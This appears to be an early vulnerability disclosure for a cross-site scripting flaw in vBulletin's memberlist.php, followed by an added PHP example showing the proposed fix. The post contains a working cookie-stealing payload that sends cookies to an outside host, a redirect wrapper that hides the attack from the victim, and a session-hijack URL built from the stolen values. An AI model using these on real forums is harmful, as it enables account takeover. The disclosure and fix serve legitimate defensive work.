vBulletin ALL versions
Vendor status: notified 3/18/2; no response

Within the first few lines of code in memberlist.php, the variable $letterbits is evaled. Because of the way PHP initializes variables, we can inject HTML or JavaScript into the document. So by directing a user to, for example:

http://www.vbulletin.com/forum/memberlist.php?letterbits=%3Cscript%3Elocation%3D%27http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Frecord%2Ephp%3Fcook%3D%27%2Bescape%28document%2Ecookie%29%3C%2Fscript%3E

(vbulletin.com has apparently patched their installation somehow), I can steal the user's password hash and user id.

Because of the way vB parses URLs, the above will not function inside the forum, but if we put this in an off-site HTML file:

<script>
location = "http://www.vbulletin.com/forum/memberlist.php?letterbits=%3Cscript%3Elocation%3D%27http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Frecord%2Ephp%3Fcook%3D%27%2Bescape%28document%2Ecookie%29%3C%2Fscript%3E"
</script>

and then link to it instead, the exploit will work as intended... the user doesn't even have to be aware of what has transpired... the above link will proceed first to the memberlist w/cookie stealing code, and then to my <shameless plug>Star Wars Galaxies Player Association's homepage. http://www.swgmotu.com </shameless plug>

With the recorded user id and password hash, we can access the site:

http://www.vbulletin.com/forum/index.php?bbuserid=[user id]&bbpassword=[password hash]

I have tried this successfully on five other users besides myself (all with consent).

I believe the simplest fix would be to initialize letterbits ($letterbits = "";) at the top of memberlist.php.

~Plato
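
The uninitialized-variable problem and the proposed one-line fix, side by side, as an added example that is not part of the original post and is not vBulletin code. It assumes the PHP behaviour referred to is register_globals (simulated here with extract()); the function names and the "ltr" parameter are hypothetical, and plain string appending stands in for the template evaluation.

```php
<?php
// Added illustration, not vBulletin source. Function names and the "ltr"
// link parameter are hypothetical stand-ins for memberlist.php.

// With register_globals on, PHP created a variable for every request
// parameter before the script ran; extract() reproduces that here.
function render_vulnerable(array $request): string
{
    extract($request);
    // $letterbits is appended to without ever being assigned, so a request
    // parameter named "letterbits" becomes its starting value.
    foreach (['A', 'B', 'C'] as $letter) {
        $letterbits .= "<a href=\"memberlist.php?ltr=$letter\">$letter</a> ";
    }
    return "<div>$letterbits</div>";
}

function render_fixed(array $request): string
{
    extract($request);
    $letterbits = '';   // the fix proposed in the post
    foreach (['A', 'B', 'C'] as $letter) {
        $letterbits .= "<a href=\"memberlist.php?ltr=$letter\">$letter</a> ";
    }
    // Defence in depth: a value that really is meant to come from the
    // request is encoded before it is written into the page.
    $shown = htmlspecialchars($request['ltr'] ?? '', ENT_QUOTES, 'UTF-8');
    return "<div>$letterbits</div><p>Showing: $shown</p>";
}

function contains_marker(string $html): bool
{
    return strpos($html, '<i>INJECTED</i>') !== false;
}

// Constructed request: a harmless marker stands in for attacker markup.
$request = ['letterbits' => '<i>INJECTED</i>', 'ltr' => '<i>INJECTED</i>'];

echo 'vulnerable page carries marker: ',
    var_export(contains_marker(render_vulnerable($request)), true), "\n";
echo 'fixed page carries marker: ',
    var_export(contains_marker(render_fixed($request)), true), "\n";
```

Initializing the variable closes this one injection point; every other variable a script uses before assigning it needs the same treatment while register_globals is enabled.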